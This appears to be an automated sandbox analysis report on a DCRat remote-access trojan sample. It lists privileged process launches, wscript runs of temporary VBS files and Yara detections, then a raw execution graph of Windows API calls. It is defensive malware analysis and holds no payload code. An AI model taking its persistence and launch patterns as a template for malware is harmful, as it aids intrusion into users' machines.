                                  Target ID:31
                                  Start time:02:42:54
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0xa60000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.1900712183.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:32
                                  Start time:02:42:55
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:33
                                  Start time:02:42:56
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:36
                                  Start time:02:43:16
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x9b0000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:37
                                  Start time:02:43:17
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:38
                                  Start time:02:43:18
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:39
                                  Start time:02:43:33
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x610000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:40
                                  Start time:02:43:34
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:41
                                  Start time:02:43:34
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:42
                                  Start time:02:43:51
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0xe30000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:43
                                  Start time:02:43:52
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:44
                                  Start time:02:43:52
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false


                                    Execution Graph

                                    Execution Coverage:9.8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:9.3%
                                    Total number of Nodes:1518
                                    Total number of Limit Nodes:37
23698->23699 23700 349792 CreateFileW 23699->23700 23701 349786 23699->23701 23700->23701 23702 3497e4 23701->23702 23703 34b66c 2 API calls 23701->23703 23702->23644 23704 3497cb 23703->23704 23704->23702 23705 3497cf CreateFileW 23704->23705 23705->23702 23707 349677 23706->23707 23712 349688 23706->23712 23708 349683 23707->23708 23709 34968a 23707->23709 23707->23712 23835 349817 23708->23835 23840 3496d0 23709->23840 23712->23657 23713->23625 23714->23634 23715->23650 23717 35bdff __EH_prolog 23716->23717 23718 35b4e5 23717->23718 23719 35aa36 ExpandEnvironmentStringsW 23717->23719 23718->23664 23730 35be36 _wcsrchr 23719->23730 23721 35aa36 ExpandEnvironmentStringsW 23721->23730 23722 35c11d SetWindowTextW 23722->23730 23725 3635de 22 API calls 23725->23730 23727 35bf0b SetFileAttributesW 23729 35bfc5 GetFileAttributesW 23727->23729 23740 35bf25 ___scrt_fastfail 23727->23740 23729->23730 23732 35bfd7 DeleteFileW 23729->23732 23730->23718 23730->23721 23730->23722 23730->23725 23730->23727 23733 35c2e7 GetDlgItem SetWindowTextW SendMessageW 23730->23733 23736 35c327 SendMessageW 23730->23736 23855 3517ac CompareStringW 23730->23855 23856 359da4 GetCurrentDirectoryW 23730->23856 23858 34a52a 7 API calls 23730->23858 23859 34a4b3 FindClose 23730->23859 23860 35ab9a 76 API calls new 23730->23860 23732->23730 23734 35bfe8 23732->23734 23733->23730 23735 34400a _swprintf 51 API calls 23734->23735 23737 35c008 GetFileAttributesW 23735->23737 23736->23730 23737->23734 23738 35c01d MoveFileW 23737->23738 23738->23730 23739 35c035 MoveFileExW 23738->23739 23739->23730 23740->23729 23740->23730 23857 34b4f7 52 API calls 2 library calls 23740->23857 23742 35d0ff __EH_prolog 23741->23742 23861 34fead 23742->23861 23744 35d130 23865 345c59 23744->23865 23746 35d14e 23869 347c68 23746->23869 23750 35d1a1 23886 347cfb 23750->23886 23752 35b504 23752->23674 23754 35cd38 23753->23754 24349 359d1a 23754->24349 23757 35cd45 GetWindow 23758 35b5d1 23757->23758 23761 35cd65 
23757->23761 23758->23531 23758->23532 23759 35cd72 GetClassNameW 24354 3517ac CompareStringW 23759->24354 23761->23758 23761->23759 23762 35cd96 GetWindowLongW 23761->23762 23763 35cdfa GetWindow 23761->23763 23762->23763 23764 35cda6 SendMessageW 23762->23764 23763->23758 23763->23761 23764->23763 23765 35cdbc GetObjectW 23764->23765 24355 359d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23765->24355 23768 35cdd3 24356 359d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23768->24356 24357 359f5d 8 API calls ___scrt_fastfail 23768->24357 23770 35cde4 SendMessageW DeleteObject 23770->23763 23771->23542 23773 35a30d 23772->23773 23774 35a2e8 23772->23774 23778 35a7c3 23773->23778 24360 3517ac CompareStringW 23774->24360 23776 35a2fb 23776->23773 23777 35a2ff FindWindowExW 23776->23777 23777->23773 23779 35a7cd __EH_prolog 23778->23779 23780 341380 82 API calls 23779->23780 23781 35a7ef 23780->23781 24361 341f4f 23781->24361 23784 35a809 23786 341631 84 API calls 23784->23786 23785 35a818 23787 341951 126 API calls 23785->23787 23788 35a814 23786->23788 23790 35a83a __vswprintf_c_l new 23787->23790 23788->23571 23788->23577 23789 341631 84 API calls 23789->23788 23790->23788 23790->23789 23791->23554 23793 35ac74 5 API calls 23792->23793 23794 35cb66 GetDlgItem 23793->23794 23795 35cbbc SendMessageW SendMessageW 23794->23795 23796 35cb88 23794->23796 23797 35cc17 SendMessageW SendMessageW SendMessageW 23795->23797 23798 35cbf8 23795->23798 23801 35cb93 ShowWindow SendMessageW SendMessageW 23796->23801 23799 35cc6d SendMessageW 23797->23799 23800 35cc4a SendMessageW 23797->23800 23798->23797 23799->23575 23800->23799 23801->23795 23802->23631 23803->23655 23804->23661 23805->23665 23806->23671 23807->23679 23808->23622 23809->23628 23810->23606 23811->23596 23812->23687 23813->23684 23815 34a214 23814->23815 23816 34a238 23815->23816 23817 34a22b CreateDirectoryW 23815->23817 23818 34a180 4 API calls 23816->23818 23817->23816 23820 34a26b 23817->23820 23819 34a23e 
23818->23819 23821 34a27e GetLastError 23819->23821 23822 34b66c 2 API calls 23819->23822 23824 34a27a 23820->23824 23827 34a444 23820->23827 23821->23824 23825 34a254 23822->23825 23824->23694 23825->23821 23826 34a258 CreateDirectoryW 23825->23826 23826->23820 23826->23821 23828 35e360 23827->23828 23829 34a451 SetFileAttributesW 23828->23829 23830 34a494 23829->23830 23831 34a467 23829->23831 23830->23824 23832 34b66c 2 API calls 23831->23832 23833 34a47b 23832->23833 23833->23830 23834 34a47f SetFileAttributesW 23833->23834 23834->23830 23836 349820 23835->23836 23837 349824 23835->23837 23836->23712 23837->23836 23846 34a12d 23837->23846 23841 3496dc 23840->23841 23842 3496fa 23840->23842 23841->23842 23844 3496e8 CloseHandle 23841->23844 23843 349719 23842->23843 23854 346e3e 74 API calls 23842->23854 23843->23712 23844->23842 23847 35e360 23846->23847 23848 34a13a DeleteFileW 23847->23848 23849 34984c 23848->23849 23850 34a14d 23848->23850 23849->23712 23851 34b66c 2 API calls 23850->23851 23852 34a161 23851->23852 23852->23849 23853 34a165 DeleteFileW 23852->23853 23853->23849 23854->23843 23855->23730 23856->23730 23857->23740 23858->23730 23859->23730 23860->23730 23862 34feba 23861->23862 23890 341789 23862->23890 23864 34fed2 23864->23744 23866 34fead 23865->23866 23867 341789 76 API calls 23866->23867 23868 34fed2 23867->23868 23868->23746 23870 347c72 __EH_prolog 23869->23870 23907 34c827 23870->23907 23872 347c8d 23913 35e24a 23872->23913 23875 347cb7 23919 35440b 23875->23919 23877 347ddf 23878 347de9 23877->23878 23883 347e53 23878->23883 23951 34a4c6 23878->23951 23880 347f06 23880->23750 23881 347ec4 23881->23880 23957 346dc1 74 API calls 23881->23957 23883->23881 23885 34a4c6 8 API calls 23883->23885 23929 34837f 23883->23929 23885->23883 23887 347d09 23886->23887 23889 347d10 23886->23889 23888 351acf 84 API calls 23887->23888 23888->23889 23891 34179f 23890->23891 23902 3417fa __vswprintf_c_l 23890->23902 23892 3417c8 23891->23892 23903 346e91 
74 API calls __vswprintf_c_l 23891->23903 23894 341827 23892->23894 23899 3417e7 new 23892->23899 23896 3635de 22 API calls 23894->23896 23895 3417be 23904 346efd 75 API calls 23895->23904 23898 34182e 23896->23898 23898->23902 23906 346efd 75 API calls 23898->23906 23899->23902 23905 346efd 75 API calls 23899->23905 23902->23864 23903->23895 23904->23892 23905->23902 23906->23902 23908 34c831 __EH_prolog 23907->23908 23909 35e24a new 8 API calls 23908->23909 23910 34c874 23909->23910 23911 35e24a new 8 API calls 23910->23911 23912 34c898 23911->23912 23912->23872 23914 35e24f new 23913->23914 23915 35e27b 23914->23915 23925 3671ad 7 API calls 2 library calls 23914->23925 23926 35ecce RaiseException __CxxThrowException@8 new 23914->23926 23927 35ecb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23914->23927 23915->23875 23920 354415 __EH_prolog 23919->23920 23921 35e24a new 8 API calls 23920->23921 23922 354431 23921->23922 23923 347ce6 23922->23923 23928 3506ba 78 API calls 23922->23928 23923->23877 23925->23914 23928->23923 23930 348389 __EH_prolog 23929->23930 23958 341380 23930->23958 23932 3483a4 23966 349ef7 23932->23966 23938 3483d3 24086 341631 23938->24086 23942 3484ce 23989 341f00 23942->23989 23945 3484d9 23945->23938 23993 343aac 23945->23993 24003 34857b 23945->24003 23947 34a4c6 8 API calls 23948 3483cf 23947->23948 23948->23938 23948->23947 23950 34846e 23948->23950 24090 34bac4 CompareStringW 23948->24090 23985 348517 23950->23985 23952 34a4db 23951->23952 23953 34a4df 23952->23953 24337 34a5f4 23952->24337 23953->23878 23955 34a4ef 23955->23953 23956 34a4f4 FindClose 23955->23956 23956->23953 23957->23880 23959 341385 __EH_prolog 23958->23959 23960 34c827 8 API calls 23959->23960 23961 3413bd 23960->23961 23962 35e24a new 8 API calls 23961->23962 23965 341416 ___scrt_fastfail 23961->23965 23963 341403 23962->23963 23963->23965 24092 34b07d 23963->24092 23965->23932 23967 349f0e 23966->23967 23968 3483ba 23967->23968 24108 
346f5d 76 API calls 23967->24108 23968->23938 23970 3419a6 23968->23970 23971 3419b0 __EH_prolog 23970->23971 23982 341a00 23971->23982 23984 3419e5 23971->23984 24109 34709d 23971->24109 23973 341b50 24112 346dc1 74 API calls 23973->24112 23975 343aac 97 API calls 23979 341bb3 23975->23979 23976 341b60 23976->23975 23976->23984 23977 341bff 23983 341c32 23977->23983 23977->23984 24113 346dc1 74 API calls 23977->24113 23979->23977 23980 343aac 97 API calls 23979->23980 23980->23979 23981 343aac 97 API calls 23981->23983 23982->23973 23982->23976 23982->23984 23983->23981 23983->23984 23984->23948 23986 348524 23985->23986 24131 350c26 GetSystemTime SystemTimeToFileTime 23986->24131 23988 348488 23988->23942 24091 351359 72 API calls 23988->24091 23991 341f05 __EH_prolog 23989->23991 23990 341f39 23990->23945 23991->23990 24133 341951 23991->24133 23994 343abc 23993->23994 23995 343ab8 23993->23995 23996 343af7 23994->23996 23997 343ae9 23994->23997 23995->23945 24268 3427e8 97 API calls 3 library calls 23996->24268 23999 343b29 23997->23999 24267 343281 85 API calls 3 library calls 23997->24267 23999->23945 24001 343af5 24001->23999 24269 34204e 74 API calls 24001->24269 24004 348585 __EH_prolog 24003->24004 24005 3485be 24004->24005 24009 3485c2 24004->24009 24292 3584bd 99 API calls 24004->24292 24006 3485e7 24005->24006 24005->24009 24011 34867a 24005->24011 24008 348609 24006->24008 24006->24009 24293 347b66 151 API calls 24006->24293 24008->24009 24294 3584bd 99 API calls 24008->24294 24009->23945 24011->24009 24270 345e3a 24011->24270 24014 348705 24014->24009 24276 34826a 24014->24276 24017 348875 24018 34a4c6 8 API calls 24017->24018 24019 3488e0 24017->24019 24018->24019 24280 347d6c 24019->24280 24021 34c991 80 API calls 24029 34893b _memcmp 24021->24029 24022 348a70 24023 348b43 24022->24023 24030 348abf 24022->24030 24027 348b9e 24023->24027 24040 348b4e 24023->24040 24024 348a69 24297 341f94 74 API calls 24024->24297 24037 348b30 24027->24037 24300 
3480ea 96 API calls 24027->24300 24028 348b9c 24033 349653 79 API calls 24028->24033 24029->24009 24029->24021 24029->24022 24029->24024 24295 348236 82 API calls 24029->24295 24296 341f94 74 API calls 24029->24296 24034 34a180 4 API calls 24030->24034 24030->24037 24032 349653 79 API calls 24032->24009 24033->24009 24036 348af7 24034->24036 24035 348c09 24049 348c74 24035->24049 24085 3491c1 ___InternalCxxFrameHandler 24035->24085 24301 349989 24035->24301 24036->24037 24298 349377 96 API calls 24036->24298 24037->24028 24037->24035 24038 34aa88 8 API calls 24042 348cc3 24038->24042 24040->24028 24299 347f26 100 API calls ___InternalCxxFrameHandler 24040->24299 24045 34aa88 8 API calls 24042->24045 24043 348c4c 24043->24049 24305 341f94 74 API calls 24043->24305 24062 348cd9 24045->24062 24047 348c62 24306 347061 75 API calls 24047->24306 24049->24038 24050 348df7 24053 348e69 24050->24053 24054 348e07 24050->24054 24051 348efd 24056 348f23 24051->24056 24057 348f0f 24051->24057 24073 348e27 24051->24073 24052 348d9c 24052->24050 24052->24051 24055 34826a CharUpperW 24053->24055 24058 348e4d 24054->24058 24066 348e15 24054->24066 24059 348e84 24055->24059 24061 352c42 75 API calls 24056->24061 24060 3492e6 121 API calls 24057->24060 24058->24073 24309 347907 108 API calls 24058->24309 24069 348eb4 24059->24069 24070 348ead 24059->24070 24059->24073 24060->24073 24064 348f3c 24061->24064 24062->24052 24307 349b21 SetFilePointer GetLastError SetEndOfFile 24062->24307 24312 3528f1 121 API calls 24064->24312 24308 341f94 74 API calls 24066->24308 24311 349224 94 API calls __EH_prolog 24069->24311 24310 347698 84 API calls ___InternalCxxFrameHandler 24070->24310 24076 34904b 24073->24076 24313 341f94 74 API calls 24073->24313 24075 349156 24078 34a444 4 API calls 24075->24078 24075->24085 24076->24075 24077 349104 24076->24077 24076->24085 24286 349ebf SetEndOfFile 24076->24286 24287 349d62 24077->24287 24081 3491b1 24078->24081 24081->24085 24314 341f94 74 API calls 
24081->24314 24082 34914b 24084 3496d0 75 API calls 24082->24084 24084->24075 24085->24032 24087 341643 24086->24087 24329 34c8ca 24087->24329 24090->23948 24091->23942 24093 34b087 __EH_prolog 24092->24093 24098 34ea80 80 API calls 24093->24098 24095 34b099 24099 34b195 24095->24099 24098->24095 24100 34b1a7 ___scrt_fastfail 24099->24100 24103 350948 24100->24103 24106 350908 GetCurrentProcess GetProcessAffinityMask 24103->24106 24107 34b10f 24106->24107 24107->23965 24108->23968 24114 3416d2 24109->24114 24111 3470b9 24111->23982 24112->23984 24113->23983 24115 3416e8 24114->24115 24126 341740 __vswprintf_c_l 24114->24126 24116 341711 24115->24116 24127 346e91 74 API calls __vswprintf_c_l 24115->24127 24118 341767 24116->24118 24123 34172d new 24116->24123 24120 3635de 22 API calls 24118->24120 24119 341707 24128 346efd 75 API calls 24119->24128 24122 34176e 24120->24122 24122->24126 24130 346efd 75 API calls 24122->24130 24123->24126 24129 346efd 75 API calls 24123->24129 24126->24111 24127->24119 24128->24116 24129->24126 24130->24126 24132 350c56 __vswprintf_c_l 24131->24132 24132->23988 24134 341961 24133->24134 24135 34195d 24133->24135 24137 341896 24134->24137 24135->23990 24138 3418a8 24137->24138 24139 3418e5 24137->24139 24140 343aac 97 API calls 24138->24140 24145 343f18 24139->24145 24143 3418c8 24140->24143 24143->24135 24149 343f21 24145->24149 24146 343aac 97 API calls 24146->24149 24147 341906 24147->24143 24150 341e00 24147->24150 24149->24146 24149->24147 24162 35067c 24149->24162 24151 341e0a __EH_prolog 24150->24151 24170 343b3d 24151->24170 24153 341e34 24154 3416d2 76 API calls 24153->24154 24156 341ebb 24153->24156 24155 341e4b 24154->24155 24198 341849 76 API calls 24155->24198 24156->24143 24158 341e63 24160 341e6f 24158->24160 24199 35137a MultiByteToWideChar 24158->24199 24200 341849 76 API calls 24160->24200 24163 350683 24162->24163 24164 35069e 24163->24164 24168 346e8c RaiseException __CxxThrowException@8 24163->24168 24165 3506af 
SetThreadExecutionState 24164->24165 24169 346e8c RaiseException __CxxThrowException@8 24164->24169 24165->24149 24168->24164 24169->24165 24171 343b47 __EH_prolog 24170->24171 24172 343b5d 24171->24172 24173 343b79 24171->24173 24229 346dc1 74 API calls 24172->24229 24174 343dc2 24173->24174 24178 343ba5 24173->24178 24246 346dc1 74 API calls 24174->24246 24177 343b68 24177->24153 24178->24177 24201 352c42 24178->24201 24180 343bf4 24181 343c26 24180->24181 24183 343c22 24180->24183 24185 343c12 24180->24185 24182 343cb1 24181->24182 24197 343c1d 24181->24197 24232 34c991 24181->24232 24214 34aa88 24182->24214 24183->24181 24231 342034 76 API calls 24183->24231 24230 346dc1 74 API calls 24185->24230 24190 343cc4 24191 343d3e 24190->24191 24192 343d48 24190->24192 24218 3492e6 24191->24218 24238 3528f1 121 API calls 24192->24238 24195 343d46 24195->24197 24239 341f94 74 API calls 24195->24239 24240 351acf 24197->24240 24198->24158 24199->24160 24200->24156 24202 352c51 24201->24202 24204 352c5b 24201->24204 24247 346efd 75 API calls 24202->24247 24205 352ca2 new 24204->24205 24208 352c9d Concurrency::cancel_current_task 24204->24208 24209 352cfd ___scrt_fastfail 24204->24209 24206 352da9 Concurrency::cancel_current_task 24205->24206 24207 352cd9 24205->24207 24205->24209 24250 36157a RaiseException 24206->24250 24248 352b7b 75 API calls 4 library calls 24207->24248 24249 36157a RaiseException 24208->24249 24209->24180 24213 352dc1 24215 34aa95 24214->24215 24217 34aa9f 24214->24217 24216 35e24a new 8 API calls 24215->24216 24216->24217 24217->24190 24219 3492f0 __EH_prolog 24218->24219 24251 347dc6 24219->24251 24222 34709d 76 API calls 24223 349302 24222->24223 24254 34ca6c 24223->24254 24225 349314 24226 34935c 24225->24226 24228 34ca6c 114 API calls 24225->24228 24263 34cc51 97 API calls __vswprintf_c_l 24225->24263 24226->24195 24228->24225 24229->24177 24230->24197 24231->24181 24233 34c9c4 24232->24233 24234 34c9b2 24232->24234 24265 346249 80 API calls 
24233->24265 24264 346249 80 API calls 24234->24264 24237 34c9bc 24237->24182 24238->24195 24239->24197 24241 351ad9 24240->24241 24242 351af2 24241->24242 24245 351b06 24241->24245 24266 35075b 84 API calls 24242->24266 24244 351af9 24244->24245 24246->24177 24247->24204 24248->24209 24249->24206 24250->24213 24252 34acf5 GetVersionExW 24251->24252 24253 347dcb 24252->24253 24253->24222 24259 34ca82 __vswprintf_c_l 24254->24259 24255 34cbf7 24256 34cc1f 24255->24256 24257 34ca0b 6 API calls 24255->24257 24258 35067c SetThreadExecutionState RaiseException 24256->24258 24257->24256 24260 34cbee 24258->24260 24259->24255 24259->24260 24261 3584bd 99 API calls 24259->24261 24262 34ab70 89 API calls 24259->24262 24260->24225 24261->24259 24262->24259 24263->24225 24264->24237 24265->24237 24266->24244 24267->24001 24268->24001 24269->23999 24271 345e4a 24270->24271 24315 345d67 24271->24315 24273 345eb5 24273->24014 24274 345e7d 24274->24273 24320 34ad65 CharUpperW CompareStringW 24274->24320 24277 348289 24276->24277 24326 35179d CharUpperW 24277->24326 24279 348333 24279->24017 24281 347d7b 24280->24281 24282 347dbb 24281->24282 24327 347043 74 API calls 24281->24327 24282->24029 24284 347db3 24328 346dc1 74 API calls 24284->24328 24286->24077 24288 349d73 24287->24288 24290 349d82 24287->24290 24289 349d79 FlushFileBuffers 24288->24289 24288->24290 24289->24290 24291 349dfb SetFileTime 24290->24291 24291->24082 24292->24005 24293->24008 24294->24009 24295->24029 24296->24029 24297->24022 24298->24037 24299->24028 24300->24037 24302 349992 GetFileType 24301->24302 24303 34998f 24301->24303 24304 3499a0 24302->24304 24303->24043 24304->24043 24305->24047 24306->24049 24307->24052 24308->24073 24309->24073 24310->24073 24311->24073 24312->24073 24313->24076 24314->24085 24321 345c64 24315->24321 24318 345c64 2 API calls 24319 345d88 24318->24319 24319->24274 24320->24274 24324 345c6e 24321->24324 24322 345d56 24322->24318 24322->24319 24324->24322 24325 34ad65 
CharUpperW CompareStringW 24324->24325 24325->24324 24326->24279 24327->24284 24328->24282 24330 34c8db 24329->24330 24335 34a90e 84 API calls 24330->24335 24332 34c90d 24336 34a90e 84 API calls 24332->24336 24334 34c918 24335->24332 24336->24334 24338 34a5fe 24337->24338 24339 34a691 FindNextFileW 24338->24339 24340 34a621 FindFirstFileW 24338->24340 24341 34a6b0 24339->24341 24342 34a69c GetLastError 24339->24342 24343 34a675 24340->24343 24344 34a638 24340->24344 24341->24343 24342->24341 24343->23955 24345 34b66c 2 API calls 24344->24345 24346 34a64d 24345->24346 24347 34a651 FindFirstFileW 24346->24347 24348 34a66a GetLastError 24346->24348 24347->24343 24347->24348 24348->24343 24358 359d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24349->24358 24351 359d21 24352 359d2d 24351->24352 24359 359d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24351->24359 24352->23757 24352->23758 24354->23761 24355->23768 24356->23768 24357->23770 24358->24351 24359->24352 24360->23776 24362 349ef7 76 API calls 24361->24362 24363 341f5b 24362->24363 24364 3419a6 97 API calls 24363->24364 24367 341f78 24363->24367 24365 341f68 24364->24365 24365->24367 24368 346dc1 74 API calls 24365->24368 24367->23784 24367->23785 24368->24367 24906 35b8e0 92 API calls _swprintf 24907 358ce0 6 API calls 24910 3716e0 CloseHandle 24373 3410d5 24378 345bd7 24373->24378 24379 345be1 __EH_prolog 24378->24379 24380 34b07d 82 API calls 24379->24380 24381 345bed 24380->24381 24384 345dcc GetCurrentProcess GetProcessAffinityMask 24381->24384 24911 35acd0 99 API calls 24950 3519d0 26 API calls std::bad_exception::bad_exception 24387 35ead2 24388 35eade CallCatchBlock 24387->24388 24413 35e5c7 24388->24413 24390 35eae5 24392 35eb0e 24390->24392 24493 35ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24390->24493 24395 35eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24392->24395 24424 36824d 24392->24424 
24398 35ebad 24395->24398 24494 367243 38 API calls 2 library calls 24395->24494 24397 35eb2d CallCatchBlock 24432 35f020 24398->24432 24408 35ebd9 24410 35ebe2 24408->24410 24495 36764a 28 API calls _abort 24408->24495 24496 35e73e 13 API calls 2 library calls 24410->24496 24414 35e5d0 24413->24414 24497 35ed5b IsProcessorFeaturePresent 24414->24497 24416 35e5dc 24498 362016 24416->24498 24418 35e5e1 24419 35e5e5 24418->24419 24507 3680d7 24418->24507 24419->24390 24422 35e5fc 24422->24390 24427 368264 24424->24427 24425 35ec4a TranslatorGuardHandler 5 API calls 24426 35eb27 24425->24426 24426->24397 24428 3681f1 24426->24428 24427->24425 24429 368220 24428->24429 24430 35ec4a TranslatorGuardHandler 5 API calls 24429->24430 24431 368249 24430->24431 24431->24395 24557 35f350 24432->24557 24435 35ebb3 24436 36819e 24435->24436 24437 36b290 51 API calls 24436->24437 24440 3681a7 24437->24440 24438 35ebbc 24441 35d5d4 24438->24441 24440->24438 24559 36b59a 38 API calls 24440->24559 24560 3500cf 24441->24560 24445 35d5f3 24609 35a335 24445->24609 24447 35d5fc 24613 3513b3 GetCPInfo 24447->24613 24449 35d606 ___scrt_fastfail 24450 35d619 GetCommandLineW 24449->24450 24451 35d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24450->24451 24452 35d628 24450->24452 24453 34400a _swprintf 51 API calls 24451->24453 24616 35bc84 24452->24616 24455 35d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24453->24455 24627 35aded LoadBitmapW 24455->24627 24458 35d636 OpenFileMappingW 24461 35d696 CloseHandle 24458->24461 24462 35d64f MapViewOfFile 24458->24462 24459 35d6a0 24621 35d287 24459->24621 24461->24451 24465 35d660 __vswprintf_c_l 24462->24465 24466 35d68d UnmapViewOfFile 24462->24466 24470 35d287 2 API calls 24465->24470 24466->24461 24472 35d67c 24470->24472 24471 358835 8 API calls 24473 35d76a DialogBoxParamW 24471->24473 24472->24466 24474 35d7a4 24473->24474 24475 35d7b6 Sleep 24474->24475 24476 35d7bd 24474->24476 24475->24476 24479 35d7cb 
